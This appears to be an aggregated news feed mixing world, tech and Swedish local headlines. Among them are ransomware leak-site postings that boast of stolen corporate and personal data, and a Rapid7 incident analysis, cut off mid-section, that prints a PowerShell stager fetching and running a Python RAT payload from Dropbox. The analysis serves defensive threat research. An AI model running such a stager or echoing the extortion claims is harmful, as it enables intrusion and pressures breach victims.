Native: Moderaterna Lerum Alingsås Tidning
Heavy defeat for IK Frisco at home against Toarpsalliansen Alingsås Tidning
US Secretary of State Marco Rubio said Washington hopes to convince Beijing to play a “more active role” in resolving the Iran crisis, a clear sign the issue will come into sharp focus when President Donald Trump holds his closely watched summit with Chinese leader Xi Jinping. Speaking to Fox News aboard Air Force One, Rubio said the Iran war was a “huge source of instability” and “threatens to destabilise Asia more than any other part of the world because it’s heavily reliant on the straits for...
Timur Kristóf of Valve's Linux open-source graphics driver team isn't done driving new improvements to aging AMD GCN 1.0/1.1 era graphics cards on Linux. Beyond enhancing display support for older APUs, transitioning GCN 1.0/1 GPUs from the legacy Radeon driver to modern AMDGPU driver, and a host of other fixes and optimizations for these old GPUs going back to the Radeon HD 7000 series, he has another notable addition that was announced today. These original GCN graphics cards with pending patches to the AMDGPU kernel driver and Mesa user-space can now allow for DRM format modifiers...
The PanVK Vulkan driver and Panfrost Gallium3D driver for Arm Mali graphics hardware now support the latest "v14" GPU hardware, with the Arm Mali G1-Pro now being advertised as supported...
Article URL: http://www.scorch2000.com/web/ Comments URL: https://news.ycombinator.com/item?id=48129694 Points: 375 # Comments: 146
The court has ordered a new trial over the June 2021 killings of Paul and Maggie Murdaugh.
After his company asked him to accept a pay cut and demotion following an AI rollout, a fintech worker sued — and won.
As social media fuels a growing passion for persimmon trees, wealthy urbanites in eastern China are paying thousands to ship prime specimens from distant villages.
WordPress Plugin Supsystic Contact Form 1.7.36 - SSTI
Apache HertzBeat 1.8.0 - Remote Code Execution
ePati Antikor NGFW 2.0.1301 - Authentication Bypass
PJPROJECT 2.16 - Heap Bufferoverflow
Palo Alto Networks found and fixed 75 flaws this month, up from its usual five
Despite continuing Israeli attacks and occupation, many people in the south still believe the armed group is the only force capable of defending them.
Apple released iOS 26.5 yesterday with a new Suggested Places feature in the Apple Maps app, which is a precursor to the ads that Apple plans to start showing later this year. There was some confusion over whether ads are live, but as of now, the Apple Maps app still doesn't have ads. Apple did start laying the groundwork for ads in iOS 26.5 and tested a splash screen, but no ads appeared during the beta testing period or after launch. When Apple announced plans to bring ads to the Maps app in March, it said that ads will be implemented in the United States and Canada "this summer." Astronomical summer in the Northern Hemisphere starts on June 21 and ends on September 22. Meteorologically, summer begins on June 1 and lasts through August, so depending on Apple's definition of summer, we'll get ads in Maps sometime between June 1 and September 22. Ads will be displayed in Apple Maps search results and in the new Suggested Places section added in iOS 26.5. Suggested Places shows recommendations based on what's trending nearby and a user's recent searches. There will be ads in the Maps app on iPhone and iPad, and they will be clearly marked with an "Ad" label, similar to how ads appear in App Store search results. Businesses will bid for ad placement, and the highest bidder for a keyword or search term will have its ad shown in search. Apple says that location data and the ads that users see and interact with in the Maps app are not associated with an Apple account, and data is not shared with third parties. There is no opt-out for location-based or personalized ads in Suggested Places. This article, "Ads Aren't in the Apple Maps App Yet, But They're Coming Soon" first appeared on MacRumors.com.
Welcome to the largest educational data breach in history - affecting nearly 9,000 institutions, every Ivy League university, and 30 million students mid-finals. When Canvas's parent company refused to pay and announced they had deployed "security patches" instead, the hackers were less than impressed. So they came back through the cat flap. Meanwhile, a famous finance expert's face has been showing up on Facebook adverts promising hot stock tips and exclusive WhatsApp investment groups. Spoiler: it isn't him, the tips aren't real, and you're about to be scammed. Plus we chat to Mike Nichols of Elastic, about how the SOC isn't dying, attackers and defenders are both deploying AI agents, and how the real security crisis is no longer human users - it's the bots acting on their behalf. All this and more in episode 467 of the "Smashing Security" podcast with cybersecurity expert and keynote speaker Graham Cluley, and special guest Danny Palmer.
A man accused of stealing hard drives containing unreleased Beyonce music, tour plans, and other materials from a rental car in Atlanta has pleaded guilty and accepted a five-year sentence, including two years in custody. Slashdot Bruce66423 shares a report from The Guardian: Kelvin Evans was by the Atlanta police department in September in connection to a July 2025 car robbery where two suitcases containing Beyonce music and tour plans were stolen from a rental car. [...] According to a July police report, Beyonce choreographer Christopher Grant and dancer Diandre Blue called 911 to report a theft from their rental vehicle, a 2024 Jeep Wagoneer, before Beyonce's Cowboy Carter tour dates in Atlanta. An October indictment stated that Evans entered the car on July 8 "with the intent to commit theft." The stolen hard drives contained "watermarked music, some unreleased music, footage plans for the show and past and future set list," according to a police report. Clothing, designer sunglasses, laptops and AirPods headphones were also stolen, Grant and Blue said. Local law enforcement searched for the location of one of the stolen laptops and the AirPods to try and locate the property. One police officer wrote in the report: "I conducted a suspicious stop in the area, due to the information that was relayed to me. There were several cars in the area also that the AirPods were pinging to in that area also. After further investigation, a silver [redacted], which had traveled into zone 5 was moving at the same time as the tracking on the AirPods." Evans was arrested several weeks after Grant and Blue filed a report, and was publicly named as the suspect in September. He was released on a $20,000 bond a month later. At the time of his arrest, Atlanta police said that the stolen property had not been recovered. It is unclear whether it has since been found. Bruce66423 commented: "Just for stealing a couple of suitcases from a car. Funny how the elite punish those who inconvenience them. Can you imagine an ordinary victim see their offender get that sort of sentence?"
If a setting fails in the forest and nobody hears it ...
$900k to Solve the Problem 5TB — While TTT Company was preoccupied with designing luxurious interiors and architectural masterpieces, they completely overlooked the design of a secure network. We have spent enough time within their internal infrastructure to conclude that their security is incredibly fragile. We have successfully exfiltrated all of the company's data and now possess 5 TB of the most sensitive information, including complete blueprints and CAD designs for prestigious clients (Toyota showrooms, gyms, luxury resorts, and government projects). We have accessed every employee's personal drive, including IDs, passports, and private medical records. Furthermore, we hold confidential contracts, tax reports (BCTC), internal financial audits, and detailed security schematics for client buildings.
+40G Full Financial Backups (Quickbooks & Reckon) - Email Archives & Staff Personal Folders - Customer/Client Databases (Installers & Integrators nationwide) - Shipment & Order Tracking for major brands like Hikvision & Axis.
West Pharmaceutical Services disclosed that it was the target of a cyberattack that resulted in data exfiltration and system encryption. [...]
Right-clicking could go the way of the 3.5-inch floppy at the Chocolate Factory
A Chinese-American was found guilty on Wednesday of acting as a Chinese agent in a case involving a Chinese police station set up in New York’s Chinatown. The week-long trial of Lu “Harry” Jianwang, 64, was seen as a test of Washington’s ability to counter what prosecutors said were efforts by Beijing to expand its influence and intimidate Chinese communities well beyond its shores. On the three charges Lu faced in the US Eastern District Court of New York, he was found guilty of acting as an...
US President Donald Trump’s landmark visit to China comes as the US-Iran war disrupts global energy supplies, fuels economic uncertainty and adds fresh strain to Washington-Beijing ties. In the latest instalment of a series examining how rivalry, interdependence and geopolitical crises are reshaping the relationship between the two powers, we look at the likely outcomes from Trump’s trip. As Donald Trump arrived in Beijing on Wednesday night for the first US presidential visit in nearly a...
The Iran-linked hacking group MuddyWater (a.k.a. Seedworm, Static Kitten) launched a broad cyber-espionage campaign targeting at least nine high-profile organizations across multiple sectors and countries. [...]
Apple's smartphone sales increased 1.3 percent year-over-year in the United States during the first quarter of 2026, according to data shared by Counterpoint Research. Apple saw a sales increase while the broader U.S. smartphone market experienced a 5.7 percent decline during the same time period. Android device sales declined 14.4 percent, while Apple's market share grew 4 percent year-over-year. iPhone 17 performance is part of the reason Apple outperformed the market, but Counterpoint says the company was also helped by a later launch of Samsung's Galaxy S26 series in March. Apple's market share increased at all three major U.S. carriers, while Android saw a decline. The iPhone made up 75 percent of sales at Verizon, AT&T, and T-Mobile, while Android devices made up 25 percent. Counterpoint expects Apple to continue to draw users to iOS because it maintained pricing with the iPhone 17e and even increased storage, while smartphone makers with slimmer hardware margins have had to raise prices. If Apple can avoid significant price increases and continue to outpace its peers in promotional dollars, it will be tough for Android OEMs to keep up in the year ahead. During Apple's April 30 earnings call, CEO Tim Cook said the iPhone 17 family was the most popular lineup in Apple's history. Cook said information from IDC indicated Apple gained market share during the quarter. Cook also said iPhone demand was off the charts, leading to supply constraints during the quarter. Apple was having trouble getting the A19 and A19 Pro chips manufactured by TSMC due to demand for TSMC's AI server chips. According to Cook, memory shortages and rising costs will have more of an impact on Apple later in 2026. Apple is expecting "significantly higher" memory costs and plans to look at a "range of options" for mitigation. Cook declined to provide insight into how Apple plans to deal with the problem, and he did not comment on whether Apple will raise prices. This article, "Apple Grew U.S. iPhone Sales While Broader Smartphone Market Declined in Q1" first appeared on MacRumors.com.
The final flight and complex legacy of a pioneering solar-powered aircraft.
I wanted to try codex after 5 months of claude code max subscription. And then I went back to my previous projects on claude design only to realize I don't have access to them anymore. This is a first. I never lost access to any of my past sessions because I unsubscribed in any of the LLM apps. I actually wanted to try out codex previously, but had similar experience with my credits. They gave extra credits equivalent to my monthly subscription price, with some time limit because claude has so many issues that month. And as soon as plan ended. I lost access to the credits. Even after resubscribing, I still don't have access to those credits. I have sympathies towards the engineers, especially the ones that are putting themselves on X. But only when someone with large following has some issue, they sort it out. Having worked at a billing company, I can see how complex contracts sound good for the growth/sales folks but are also horrible for engineers actually implementing those contracts. Their complex rate limiting which is now a norm, identifying other harnesses to count them against extra usage are all probably not easy to implement without very rough edge cases. But all the "bugs" are just where the user gets screwed is what is problematic. I just wanted to post this here, after tagging them multiple times on X to alert other users. Comments URL: https://news.ycombinator.com/item?id=48128003 Points: 288 # Comments: 80
The US strikes on Iran sent a clear signal to Pyongyang. But rather than retreat or show renewed interest in denuclearisation, North Korea has doubled down on deterrence. In recent weeks, Pyongyang has tightened security around its leadership and continued its missile launches, underscoring its sensitivity to Washington’s military posture. From Pyongyang’s perspective, these moves are meant not only to gauge how far US military pressure could one day extend, but also to signal that North Korea’s...
Security governance needs to be more than an annual compliance exercise. New companies are emerging to address risk-management gaps in current audit tools.
Eight children are among those reported dead after a series of air strikes hit the south of Beirut.
A US Senate hearing on nuclear capabilities issued a warning about China on Wednesday, hours before US President Donald Trump was due to meet Chinese President Xi Jinping. Senator Roger Wicker, the Mississippi Republican who chairs the Senate Armed Services Committee, said in his opening statement that China has been engaged in an “unprecedented nuclear expansion” in recent years. China, Wicker said, had “rapidly constructed hundreds of new missile silos, expanded mobile missile and ballistic...
Threat actors are publishing RubyGems packages that include scrapers targeting public-facing UK government servers, but with no clear objective.
"Look how transparent we are," says the White House. How about some piping-hot documents about JFK and Martin Luther King Jr.? Oh, it's Epstein files you want, you say. Okay, some UFO files then? Not that either. "The most transparent administration ever" is having a hard time.
Lightning-fast dots of light, orange "blobs" and flying stars. The Pentagon's latest release of UFO files sounds promising for anyone curious about the unknown. But the release has had a lukewarm reception, to say the least. "We get very little information," says Oskar Jungell of UFO Sverige.
And neither AI nor international conflict are helping
But Pro or Max biz users should know that the company may train its AI on your data
An OPSEC failure provides a window into what helped the ransomware group rise: a generous affiliate model, opportunistic TTPs, and an effective organizational structure.
Approval is no surprise after FCC chair pressured EchoStar to sell licenses.
Latest news - read the news from the past seven days at Alingsås Tidning - Alingsås Tidning
Distinct form of tooth protein in Homo erectus shows up in Denisovans—and us.
A critical vulnerability affecting certain configurations of the Exim open-source mail transfer agent could be exploited by an unauthenticated remote attacker to execute arbitrary code. [...]
The Trump administration on Wednesday publicly renewed an offer of US$100 million in humanitarian aid to Cuba, stepping up pressure on Havana despite Beijing’s continued political and economic backing for the island. The announcement came as US President Donald Trump travelled to China this week for talks with Chinese President Xi Jinping, with Trump saying before departure that Cuba would be among the issues discussed during the visit. In a statement issued on Wednesday, the State Department...
Apache, Alibaba databases vulnerable and only one has a patch
Article URL: https://www.dailyprincetonian.com/article/2026/05/princeton-news-adpol-proctoring-in-person-examinations-passed-faculty-133-years-precedent Comments URL: https://news.ycombinator.com/item?id=48126848 Points: 381 # Comments: 594
The drugs had an estimated worth of over $9 million USD.
"This is the biggest change to the independent school system since it was introduced," says Simona Mohamsson (L) about the new proposal from the government and the Sweden Democrats to tighten the conditions for the country's independent schools. But the measures are not enough to stop the profit withdrawals, argues the Social Democrats' Anders Ygeman during a debate on Aktuellt.
It looked set to be a goalless affair. Then Stina Blackstenius stepped up and fired her Arsenal to victory in stoppage time. "Stina does it very well," says teammate Beth Mead in the broadcast.
Kevin Warsh becomes the new head of the US central bank, the Federal Reserve. This became clear after the Senate gave him the green light on Wednesday.
Old "honor code" systems are under strain.
Donald Trump did not land alone on Chinese soil. With him to the negotiations in Beijing he has a large part of the US tech and finance elite. "Some interpret it as a clear show of strength by the US economy and business community," says SVT's US correspondent Sofia Yohannes.
ICCL Enforce project offers Verity fact-checking server
The requirement that Postnord deliver letters every other day is being scrapped, reports Dagens industri. Instead, the majority are to be delivered every third day.
About Silergy Silergy Corp. specializes in the manufacture and sale of power integrated circuits. Silergy Corp. is headquartered in Hangzhou, Zhejiang, China. ---- More than 450 GB of personal data was leaked, along with a vast amount of financial and private information, including contracts containing non-disclosure clauses, passports, and customer and partner data.
Meta today announced the launch of Instants, a new image sharing option on the Instagram social network. Instants are ephemeral photos that disappear from Instagram after they're viewed by a user's friends or after a 24-hour period. Reactions and replies to Instants images show up in DMs instead of on the post. Instants photos are only displayed for a short period, but they are saved to a user's archive for a year and can be reshared to Stories. Instants cannot be edited, with no option for filters, stickers, or modifications beyond captions. That sets them apart from Stories, which is already an Instagram feature. Instants is an Instagram feature, but Meta has also developed a standalone Instants companion app "for quicker camera access." The standalone app is a direct competitor to Snapchat, the original ephemeral image social network. The new app can be used for sharing Instants, but on Instagram, users can also share Instants from a new camera option in the Direct Messages section of the app. Instants can be viewed on Instagram by opening up DMs and tapping on the new Instants box in the bottom right corner of the inbox. Photos can be shared with friends set as close friends, or as mutuals, aka followers that an Instagram user follows back. Instants are not able to be screenshotted or screen recorded, providing privacy features not available with other Instagram image types. Meta says that Instants are designed for casual, everyday photos. The standalone app is limited to select countries, as Meta says that it is an experiment. Images shared on the Instants app will show up for friends on Instagram, and images shared on Instagram will show up in the Instants app. Instants on Instagram is available globally starting today, and the app is also available for download in countries where it is supported. This article, "Meta Launches 'Instants' App for Sharing Disappearing Photos on Instagram" first appeared on MacRumors.com.
The type of bar matters when it comes to how it bends and recoils, but why is still a mystery.
Article URL: https://www.propublica.org/article/evicore-health-insurance-denials-cigna-unitedhealthcare-aetna-prior-authorizations Comments URL: https://news.ycombinator.com/item?id=48126000 Points: 215 # Comments: 203
Informa TechTarget's flagship cybersecurity media brand launches a special content series to mark two decades as a trusted source for cybersecurity professionals.
"NASA also is defining the concept of operations for the mission."
Article URL: https://www.jdhodges.com/blog/macbook-neo-benchmarks-analysis/ Comments URL: https://news.ycombinator.com/item?id=48125617 Points: 330 # Comments: 389
What you need to know about Donald Trump vs President Xi
Europe's appetite for oil and gas has become good business for the Norwegian oil companies. The Norwegian government recently decided to open up for the search for new oil and gas finds.
Apple is looking into ways to better support apps that include AI agents and AI coding capabilities in the App Store, reports The Information. Apple is designing a system that would maintain its security and privacy standards while allowing for AI app features, but details on how the system will work are unavailable. Apple started blocking updates for some popular vibe coding apps in March because those apps violated App Store rules that prohibit apps from executing code that alters their own functionality or that of other apps. Vibe coding apps let users build apps and websites with little to no coding experience, using AI agents and natural language prompts. Vibe coding has become popular, and Apple's rules have not been able to keep up. Apps that include AI agents present similar problems for Apple. AI agents can autonomously complete complex actions and make mini apps using tools and capabilities that would not traditionally be supported under Apple's App Store rules. Apple will need to make changes to keep up with the software trends that developers and users want. Apple wants to incorporate AI agents into the App Store while preventing some of the issues that people have run into with rogue AI agents deleting content and causing other problems. As it works to prepare for future AI apps, Apple is also developing its own AI capabilities. Siri is set to get a major overhaul in iOS 27, making it smarter and better able to compete with Claude and ChatGPT. Apple has partnered with Google to use custom Gemini models to power Siri. The Information says Apple has started contacting app developers to integrate app capabilities like booking flights and sending calendar invites into the new version of Siri and Apple Intelligence. Some developers are hesitant to work with Apple to integrate their apps into Siri because they are worried about providing new ways for Apple to collect commissions. Apple is telling some developers that it does not plan to charge commissions during the early stages of the partnership, but that fees are a possibility in the future. Apple has held talks with Baidu, Alibaba, and Tencent about Siri integration in iOS 27, but the companies do not want to end up paying fees to Apple. Apple also plans to allow users to select from multiple chatbots to use with Siri, instead of limiting people to OpenAI's ChatGPT. AI models from companies like Anthropic or Google could be used for Image Playground and Writing Tools the way ChatGPT can be used today. It is not clear if Apple plans to open up more of iOS to third-party chatbots, but OpenAI has reportedly been disappointed with Apple's limitations. ChatGPT can be used to generate images and text through the iOS integration, but it cannot access user emails or other personal information. Customers are also rarely using the functionality, according to The Information. Apple's new version of Siri is expected to be unveiled at the WWDC keynote on June 8, and the plans that Apple has for agentic AI apps in the App Store could also be discussed at the same time. This article, "Apple Working on Plan to Allow AI Agent Apps on the App Store" first appeared on MacRumors.com.
MicroMarketing specializes in expert title selections for books, audio CDs, and DVDs, catering primarily to librarians and libraries. The company is known for its personalized service, ensuring that clients receive timely and efficient support without automated responses. They offer valuable services such as downloadable invoices and MARC records, along with a strong price-value proposition. MicroMarketing's commitment to quality and customer satisfaction has garnered positive testimonials from clients who appreciate their reliable and responsive service
Pamil Modulsystem specializes in renting flexible modular buildings tailored for various needs, including offices and schools. Established in 1963, the company focuses on providing high-quality, customizable solutions that enhance work and learning environments. They manage the entire process from planning and construction to maintenance, ensuring a seamless experience for their clients. Committed to sustainability, Pamil emphasizes circular building practices by renovating returned modules for future use.
Tricon Infotech delivers efficient, automated solutions and full digital transformations through custom products and enterprise implementations. The company's worldwide clients include leaders in the publishing, educational technology, finance, and legal sectors
How much more expensive will petrol be if Helldén gets to decide, and what is he better at than his colleague Amanda Lind? MP's spokesperson answers the audience's questions directly from his private office, and no question is off limits!
Microsoft has responded to the MacBook Neo by commissioning a study that highlights advantages of some Windows laptops. Market research firm Signal65 evaluated four Windows laptops: Lenovo's IdeaPad Slim 3x, Lenovo's Yoga 7i, HP's OmniBook 5, and HP's OmniBook X Flip. With a starting price of $549.99 on Best Buy's online store in the U.S. at the time of this writing, the IdeaPad Slim 3x is the only laptop in the study that currently rivals the MacBook Neo's starting price of $499 (college students) to $599 (general public). The other three laptops currently start at $749 to $1,029 at Best Buy. Signal65 outlined some of the IdeaPad Slim 3x's advantages over the MacBook Neo:
Feature | IdeaPad Slim 3x | MacBook Neo
Display Size | 15.3-inch | 13-inch
CPU | Snapdragon X1 with "90% faster" multi-core Cinebench 2026 score | A18 Pro
Base RAM | 16GB | 8GB
Fingerprint Scanner | Included | Touch ID limited to $699 model
Ports | 1× USB-C, 2× USB-A, SD, and HDMI | 2× USB-C only
Wi-Fi | Wi-Fi 7 | Wi-Fi 6E
Backlit Keyboard | Yes | No
Touch Screen | Yes | No
In addition, the IdeaPad Slim 3x achieved longer battery life (16 hours and 29 minutes) compared to the MacBook Neo (13 hours and 28 minutes) in a Tom's Guide test, with Lenovo able to fit a larger battery inside a 15-inch laptop. The study indicated that the IdeaPad Slim 3x has 512GB of storage, but the $549.99 base model has a 256GB SSD, which matches the MacBook Neo. Through June 30, Microsoft is offering U.S. college students a free one-year Microsoft 365 Premium subscription, a free one-year Xbox Game Pass Ultimate subscription, and a free Xbox controller with the purchase of a qualifying Windows laptop, including the IdeaPad Slim 3x. The bundle has a value of more than $500. On the other hand, the MacBook Neo has some advantages over the IdeaPad Slim 3x:
Feature | MacBook Neo | IdeaPad Slim 3x
Display Resolution | 2,408×1,506 pixels (Retina quality) | 1,920×1,200 pixels
Display Brightness | 500 nits | 300 nits
Build Material | Fully aluminum enclosure | Mix of aluminum and plastic
Webcam | 1080p camera | 720p camera
Moreover, many reviewers indicated that the MacBook Neo has a superior trackpad and speakers compared to Windows laptops within the same price range. Plus, the MacBook Neo runs macOS instead of Windows, so it benefits from Apple's tight hardware and software integration and features that work across multiple Apple devices. While it is unsurprising that this Microsoft-backed study is focused on promoting Windows laptops, the reality is that the MacBook Neo and the IdeaPad Slim 3x both have pros and cons. More competition in the affordable laptop market is a win overall. This article, "New Study Highlights Advantages of $549 Windows Laptop Over MacBook Neo" first appeared on MacRumors.com.
The variant of hantavirus that has spread on MV Hondius does not differ from similar virus outbreaks, according to the European disease control agency ECDC. At the same time, more people are expected to fall ill in the coming weeks. "It is a very complex situation," says ECDC head Pamela Rendi-Wagner.
Here is a selection of the events in western Sweden on Wednesday, May 13.
Nigel Farage, leader of the right-wing populist Reform UK, is being investigated for having received five million pounds without declaring it, British media report.
Since Intel Meteor Lake there has been the Intel Silicon Security Engine, which serves as a silicon root-of-trust for secure firmware loading, boot measurements, and similar functionality. The Intel Silicon Security Engine has been built upon with Lunar Lake and Panther Lake and is set to take on more importance with future Intel hardware platforms. We are now seeing a Linux driver arrive for this silicon RoT with the Intel Silicon Security Engine Interface (ISSEI)...
A man in his 30s residing in Östersund municipality is sentenced to two years and three months in prison for raping a child. He is also convicted of assault and unlawful threats, but acquitted of aggravated unlawful threats and aggravated interference in a judicial matter.
AI rollback rates hit 81% at firms with mature guardrails, suggesting enterprises are struggling to manage the systems in production, says Sinch
Trafikverket's warning: roe deer on the road on the E20 - Alingsås Tidning
A cybersecurity researcher has published proof-of-concept (PoC) exploits for two unpatched Microsoft Windows vulnerabilities named YellowKey and GreenPlasma, which are a BitLocker bypass and a privilege-escalation flaw. [...]
Physicist warns proposed Stratos campus could seriously affect local environment
6 degrees and overcast with rain showers in Alingsås during the evening. Alingsås Tidning
Security pros warn YellowKey claim could make stolen laptops a much bigger problem
Apple has stepped in to warn that EU proposals to force Google to open Android to competing AI services pose serious risks to user privacy, security, and safety.

Apple's latest submission to the EU comes (via Reuters) in response to the European Commission's call for feedback on draft measures designed to help Google comply with the Digital Markets Act (DMA). The proposals would allow competing AI services to interact with Android apps to perform actions such as sending emails, ordering food, or sharing photos.

Google has already pushed back on the plans, arguing they would undermine key privacy and security safeguards for European users. Apple, which is itself now subject to EU measures requiring it to open up its own ecosystem, said it has a strong interest in the case given its own operating systems for iPhone, iPad, and Mac.

In its submission, Apple said the draft measures "raise urgent and serious concerns," warning that if confirmed, "they would create profound risks for user privacy, security, and safety as well as device integrity and performance." Apple also took aim at the rapidly evolving state of AI as a particular source of concern, arguing that risks are "especially acute in the context of rapidly evolving AI systems whose capabilities, behaviours, and threat vectors remain unpredictable." The company questioned the EU's technical expertise in drawing up the proposals, stating that the Commission is "substituting judgments made by Google's engineers for its own judgment based on less than three months of work," and suggesting the only discernible goal of the draft measures is "open and unfettered access."

Apple has a long history of clashing with EU regulators over the DMA. The company challenged the regulation in court in October 2025, and urged regulators to scrap it entirely the month before, arguing it had created security vulnerabilities and worsened the user experience. The EU said it had no intention of repealing the law in response.

The feedback period for the proposals ran from April 27 to May 13, 2026. The European Commission has said it will carefully assess all submissions and may adjust the proposed measures as a result, though its final decision must be adopted within six months of the opening of the specification proceedings, giving a deadline of July 27, 2026. The EU separately concluded in May 2026 that the DMA has had a positive impact overall, setting aside Apple's lobbying for the regulation to be revised.

This article, "Apple Defends Google Against EU Proposal to Give AI Rivals Access to Services" first appeared on MacRumors.com
Former Gerdsken standout is a success at Elfsborg. Alingsås Tidning
Security leaders discuss the first AI-created zero-day exploit.
Washington and Beijing have piled on irritants in advance of this week’s summit between US President Donald Trump and his Chinese counterpart Xi Jinping, suggesting that neither side wants to be seen as a deal killer – even as they try to build potential leverage to bargain away, analysts and former US government officials said. Scott Kennedy, senior adviser with the Centre for Strategic and International Studies (CSIS), said that both sides had been “picking up some chits which they might be...
Following last week's disclosure of the Dirty Frag vulnerability for the Linux kernel, which only finished being patched up in mainline on Monday, Fragnesia is now public as a similar local privilege escalation (LPE) vulnerability...
Following last month's coverage of an unofficial Mac port of Notepad++ that the original developer called out for trademark violation, the dispute has now been resolved with a rebrand.

The macOS port was previously released by Andrey Letov under the Notepad++ name without authorization. Don Ho created the original Windows code editor in 2003, and had publicly objected to the unofficial app's use of his trademark and the inclusion of his name and biography on its author page. After settling the dispute, the app has subsequently been renamed Nextpad++.

The site for Nextpad++ has been thoroughly updated and clearly states that the app is an "open-source and independent community port of Notepad++ to macOS." Elsewhere, Letov's About page describes the project as a Mac port of the Notepad++ GPL codebase, built on Objective-C++, Scintilla, and Cocoa, and shipped as a universal binary for Apple silicon and Intel Macs. The app also has a new icon.

Names aside, it seems Daring Fireball's John Gruber is less than charmed by the result, describing the app as feeling "unholy" and suggesting the rapid port could only have been built with AI vibe-coding tools. The site states development began on March 10.

Have you tried out Nextpad++ for Mac? Let us know what you think in the comments.

This article, "Notepad++ Mac Port Renamed Nextpad++ After Trademark Row" first appeared on MacRumors.com
Article URL: https://kotaku.com/kickstarter-is-the-latest-platform-seemingly-forced-to-ban-adult-content-by-payment-processors-2000695648 Comments URL: https://news.ycombinator.com/item?id=48123198 Points: 394 # Comments: 280
A 21-year-old man has been remanded in custody in absentia by Uppsala District Court. Among other things, he is suspected of being behind the placement of three thermos bombs in Svartbäcken during the Uppsala Marathon. According to SVT's sources, he belongs to the top tier of the criminal Foxtrot network. He is now being hunted internationally and is one of the highest-priority individuals on Europol's list of wanted persons.
Patch series would bring memory-safe code to Linux's s390 port, with compiler caveats attached
Article URL: https://ossresistance.com/ Comments URL: https://news.ycombinator.com/item?id=48123015 Points: 270 # Comments: 84
Cross-border train journeys may become easier to book. The EU wants to bring together tickets from different operators and strengthen passenger protection when something goes wrong during the journey.
US President Donald Trump arrived in China – flanked by his top aides and American tech leaders – on Wednesday night as Beijing rolled out a lavish welcome ceremony at the airport. He was received by Chinese Vice-President Han Zheng at Beijing Capital International Airport. Trump’s entourage includes Jensen Huang, CEO of Nvidia and a last-minute addition to the trip, as well as US Defence Secretary Pete Hegseth, US Secretary of State Marco Rubio, billionaire entrepreneur Elon Musk and Tim Cook...
Article URL: https://fredchan.org/blog/locality-domains-guide/ Comments URL: https://news.ycombinator.com/item?id=48122635 Points: 612 # Comments: 212
Overview

Attackers do not need to break into the front door when they can convince employees to open it for them through the tools they already trust.

In April 2026, Rapid7 investigated an enterprise intrusion that began with a Microsoft Teams message from a fake “IT Support” account and quickly escalated into a full compromise chain involving malware deployment, privilege escalation, credential theft, lateral movement, and exfiltration. The incident illustrates a critical risk for modern enterprises: Collaboration platforms have become part of the attack surface, and when combined with identity abuse and Living-off-the-Land techniques, they can provide attackers with a low-friction path into the environment.

Therefore, this attack was particularly concerning due to the way the intrusion shifted from endpoint compromise to broader identity-driven risk. And while it was not surprising that the attacker used a novel technique, what was concerning was how the attacker was able to chain together familiar enterprise weaknesses into a fast-moving and operationally effective intrusion.

By abusing Teams external access, the threat actor delivered a Dropbox-hosted Python payload that established command-and-control, deployed multiple backdoors, and began mapping the internal environment. The attacker then escalated privileges to SYSTEM using CVE-2023-36036 before deploying a fake Windows lock screen designed to harvest the user’s domain password.

Once valid credentials were obtained, the intrusion shifted from endpoint compromise to broader identity-driven risk. The attacker moved laterally to a second host and used legitimate tooling such as DumpIt to collect system memory, which was likely exfiltrated via an anonymous file-sharing service.
This progression underscores a key reality for defenders: Once collaboration, identity, and endpoint controls are bypassed or weakened, attackers can rapidly convert initial access into meaningful enterprise exposure.

Rapid7’s technical analysis linked the Python malware to ModeloRAT, a framework previously documented by multiple security vendors in browser extension campaigns and associated with the KongTuke group. More broadly, this intrusion demonstrates how trusted communication channels, Living-off-the-Land techniques, and credential-focused tradecraft continue to challenge traditional security controls. The takeaways here are clear:

- For CISOs: Collaboration tools are part of your attack surface. Attackers used Teams to reach users directly. Security, identity protection, endpoint visibility, and rapid detection engineering must be treated as connected parts of the same defense strategy, not separate control domains.
- For defenders: Old vulnerabilities and trusted tools still work. The attack combined a patched vulnerability (CVE-2023-36036) with widely trusted tools like Python, PowerShell, and Dropbox. None of these are unusual in enterprise environments, which is precisely what allowed the attacker to blend in while moving quickly. It’s an obvious restatement, but external access should always be controlled and monitored. The challenge isn’t identifying one suspicious event; it’s recognizing when normal activity starts to form a pattern, and acting before that pattern turns into widespread exposure.

Rapid7 coverage

Rapid7 has coverage for this campaign across both intelligence and detection workflows. The campaign is available in Rapid7’s Intelligence Hub, providing customers with curated context, indicators, and threat actor tradecraft to support awareness, investigation, and prioritization.
Relevant detections are also available in InsightIDR, helping security teams identify activity associated with this intrusion pattern across their environments.

Figure 1: Attack chain from Teams phishing to payload delivery, ModeloRAT execution, privilege escalation, and lateral movement with exfiltration.

A door that was never closed

The intrusion started with abuse of Microsoft Teams external access. This feature, enabled by default in some environments, allows users in one tenant to initiate direct chats with users in another. In our incident, the attacker used a newly created tenant UCICasociacion.onmicrosoft[.]com to impersonate “IT Support” and messaged a targeted employee.

This approach mirrors tradecraft seen in Octo Tempest-style campaigns. Octo Tempest (alias Scattered Spider, UNC3944, 0ktapus) is a financially motivated cybercriminal group active since 2022, known for aggressive social engineering tactics including helpdesk impersonation, SIM swapping, and MFA manipulation. Shortly after the interaction, a hidden PowerShell command executed on the victim’s machine, staging the initial payload.

Stager: Bring your own Python

Within minutes of the Teams interaction, a PowerShell stager executed on the endpoint and reached out to Dropbox to retrieve a ZIP archive (Winp.zip) into the user’s AppData directory.

The archive was immediately extracted and deleted, likely to reduce on-disk artifacts and avoid raising suspicion.

The payload contained a portable WinPython environment, which the attacker used to launch the next stage:

- collector.py (reconnaissance)
- Pmanager.py (primary C2 agent, Modelo RAT)

Execution was handled via pythonw.exe, which allowed the script to run in the background without showing the terminal window.

    iwr -Uri "https://www.dropbox[.]com/scl/fi/[REDACTED]/vuzggemyofftzpk6.zip?rlkey=elabnna8r5omwglaq4feay6ui&st=op5i7lea&dl=1" -OutFile "$env:appdata\Winp.zip"; Expand-Archive -Path "$env:appdata\Winp.zip" -DestinationPath "$env:appdata"; rm "$env:appdata\Winp.zip"; Start-Sleep -Seconds 5; Start-Process $env:appdata\WPy64-31401\python\pythonw.exe -ArgumentList $env:appdata\WPy64-31401\python\collector.py; Start-Sleep -Seconds 30; Start-Process $env:appdata\WPy64-31401\python\pythonw.exe -ArgumentList $env:appdata\WPy64-31401\python\Pmanager.py; Start-Sleep -Seconds 5

Figure 2: PowerShell stager retrieving and executing portable Python payload.

Reconnaissance: Environment discovery via native tools

The first Python module executed by the attacker was collector.py, a post-exploitation information gatherer designed to silently profile the host and save the results to %TEMP%\configA.json. Additionally, before any reconnaissance, collector.py computes a host fingerprint. This 8-character fingerprint is what the operator's C2 server uses to identify this victim.

